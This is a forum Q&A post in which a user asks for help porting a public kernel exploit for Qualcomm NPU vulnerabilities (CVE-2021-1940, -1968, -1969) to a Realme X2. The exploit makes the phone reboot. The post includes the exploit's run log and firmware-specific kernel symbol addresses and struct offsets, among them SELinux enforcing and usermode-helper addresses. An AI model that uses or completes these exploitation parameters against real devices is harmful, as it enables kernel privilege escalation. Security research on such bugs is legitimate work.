Exploit for Qualcomm NPU bugs (CVE-2021-1940, CVE-2021-1968, CVE-2021-1969) #806
bitbounty85 asked this question in Q&A
I am trying the NPU exploit "https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Qualcomm/NPU" on a Realme X2 device; the device specifications are given below.
Device Specifications:
Model: RMX1992
Processor: Qualcomm SDM730G AIE Octa-core
Storage: 4 GB RAM, 64 GB internal storage
Android_version: 10
Android_security_patch_level: 5 May 2021
kernel_version: 4.14.117
build_no: RMX1992EX_11_C.18
firmware: RMX1992EX_11_OTA_1180_all_4MQxOL7lVVxp.ozip
The phone is rebooting; the log is given below.
[+] host_irq_wq offset: ffffffc3ee54d418
RMX1992L1:/data/local/tmp $ [+] network_stats_buf (controlled data) address: 0xffffffc38f9e4000
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 4 reallocation threads ready!
[+] trigger uaf
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 8 reallocation threads ready!
<phone_reboots_here>
I extracted the kernel.elf from the firmware, found the addresses, and subtracted 0x80000 to get the offsets below.
#define BPF_PROG_RUN32 0xFFFFFF8008146068
#define INIT_TASK 0xFFFFFF8009D9CC00
#define HOST_IRQ_WQ 0xFFFFFF80089F9DF8
#define ION_DMA_BUF_VUNMAP 0xFFFFFF8008BDF5D0
#define BPF_CALL_BASE 0xFFFFFF8008144770
#define SELINUX_ENFORCING 0xFFFFFF800A4A1000
#define DO_TASK_DEAD 0xFFFFFF800806D580
#define MEMSET 0xFFFFFF80090A7200
#define MEMCMP 0xFFFFFF80090A6D04
#define ARGV_SPLIT 0xFFFFFF80090A78E8
#define CALL_USERMODEHELPER 0xFFFFFF8008050280
#define RUN_CMD_ENVP 0xFFFFFF8009DAE370
#define ION_ALLOC_FD 0xFFFFFF8008BDDDB0
//offsets to dma_buf and ion_buffer
#define PRIV_OFF 168
#define HEAP_OFF 32
#define OPS_OFF 56
#define MAP_OFF 16
#define UNMAP_OFF 24
#define CNT_OFF 136
From vmlinux I got the above offsets; the structures from which I got these offsets are shown below.
struct dma_buf {
...
void* priv; //PRIV_OFF
...
};
struct ion_buffer {
...
struct ion_heap* heap; //HEAP_OFF
...
int kmap_cnt; //CNT_OFF
...
};
struct ion_heap {
...
struct ion_heap_ops* ops; //OPS_OFF
...
};
struct ion_heap_ops {
...
void* (*map_kernel)(struct ion_heap *, struct ion_buffer *); //MAP_OFF
void (*unmap_kernel)(struct ion_heap *, struct ion_buffer *); //UNMAP_OFF
...
};
Can you please help me @m-y-myo?